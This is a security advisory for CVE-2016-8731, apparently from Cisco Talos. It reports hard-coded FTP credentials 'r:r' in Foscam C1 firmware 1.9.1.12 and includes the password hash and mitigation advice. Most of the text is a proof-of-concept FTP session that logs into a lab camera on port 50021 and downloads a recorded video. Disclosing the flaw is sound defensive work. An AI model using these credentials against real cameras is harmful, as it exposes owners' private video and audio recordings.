CVE-2016-8731
Hard-coded FTP credentials (r:r) are included in the Foscam C1 running firmware 1.9.1.12. Knowledge of these credentials would allow remote access to any cameras found on the internet that do not have port 50021 blocked by an intermediate device.
Foscam C1 Firmware Version 1.9.1.12
9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-259: Use of Hard-coded Password
The file found at ‘/mtd/app/bin/ftpd/pureftpd.passwd’ contains the following hash: r:$1$whR6Mhk0$FR1VT/mX5D/qwRsgCkHLO.:1001:1001::/mnt/sd/./::::::::::::
This hash resolves to a simple user/pass combo of ‘r:r’. The user/pass of r:r permits anyone to log into a Foscam camera and have full read/write to the mounted Micro-SD card, which contains .avi videos and .jpg snapshots. If the camera has a microphone, the .avi videos will have audio recording as well. An attacker armed with this knowledge can connect remotely to the target camera and dump potentially sensitive data.
$ ftp 192.168.1.19 50021
Connected to 192.168.1.19 (192.168.1.19).
220---------- Welcome to Pure-FTPd [privsep] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 19:04. Server port: 50021.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.1.19:user): r
331 User r OK. Password required
Password:
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (192,168,1,19,80,232)
150 Accepted data connection
drwxrwxrwx 3 0 0 32768 Sep 28 13:12 IPCamera
226-Options: -l
226 1 matches total
ftp> cd IPCamera
250 OK. Current directory is /IPCamera
ftp> ls
227 Entering Passive Mode (192,168,1,19,200,199)
150 Accepted data connection
drwxrwxrwx 4 0 0 32768 Jan 1 2010 C1_000000001
226-Options: -l
226 1 matches total
ftp> cd C1_000000001
250 OK. Current directory is /IPCamera/C1_000000001
ftp> ls
227 Entering Passive Mode (192,168,1,19,112,123)
150 Accepted data connection
drwxrwxrwx 48 0 0 32768 Nov 13 15:57 record
drwxrwxrwx 48 0 0 32768 Nov 13 15:57 snap
226-Options: -l
226 2 matches total
ftp> cd record
250 OK. Current directory is /IPCamera/C1_000000001/record
ftp> ls
227 Entering Passive Mode (192,168,1,19,54,239)
150 Accepted data connection
drwxrwxrwx 3 0 0 32768 Nov 1 16:54 20161101
drwxrwxrwx 3 0 0 32768 Nov 5 01:29 20161104
drwxrwxrwx 3 0 0 32768 Nov 5 19:32 20161105
drwxrwxrwx 3 0 0 32768 Nov 7 16:32 20161107
drwxrwxrwx 3 0 0 32768 Nov 8 20:04 20161108
drwxrwxrwx 3 0 0 32768 Nov 10 02:05 20161109
drwxrwxrwx 3 0 0 32768 Nov 13 15:57 20161113
226-Options: -l
226 46 matches total
ftp> cd 20161104
250 OK. Current directory is /IPCamera/C1_000000001/record/20161104
ftp> ls
227 Entering Passive Mode (192,168,1,19,69,159)
150 Accepted data connection
drwxrwxrwx 2 0 0 32768 Nov 5 01:34 20161104_202945
226-Options: -l
226 1 matches total
ftp> cd 20161104_202945
250 OK. Current directory is /IPCamera/C1_000000001/record/20161104/20161104_202945
ftp> ls
227 Entering Passive Mode (192,168,1,19,248,107)
150 Accepted data connection
-rwxrwxrwx 1 0 0 12618644 Nov 5 01:34 SDalarm_20161104_202945.avi
-rwxrwxrwx 1 0 0 320000 Nov 5 01:34 index.dat
226-Options: -l
226 2 matches total
ftp> get SDalarm_20161104_202945.avi
local: SDalarm_20161104_202945.avi remote: SDalarm_20161104_202945.avi
227 Entering Passive Mode (192,168,1,19,243,42)
150-Accepted data connection
150 12322.9 kbytes to download
quit
226-File successfully transferred
226 30.430 seconds (measured here), 404.96 Kbytes per second
12618644 bytes received in 30.4 secs (414.43 Kbytes/sec)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 12323 kbytes.
221 Logout.
$ exit
exit
Exploitation relies on the availability of port 50021 (the default FTP port that this camera uses). Preventing access to this port or disabling FTP completely will help mitigate this vulnerability.
2016-11-29 - Vendor disclosure
2017-06-19 - Public release
Discovered by Richard Harman and Dave McDaniel of Cisco Talos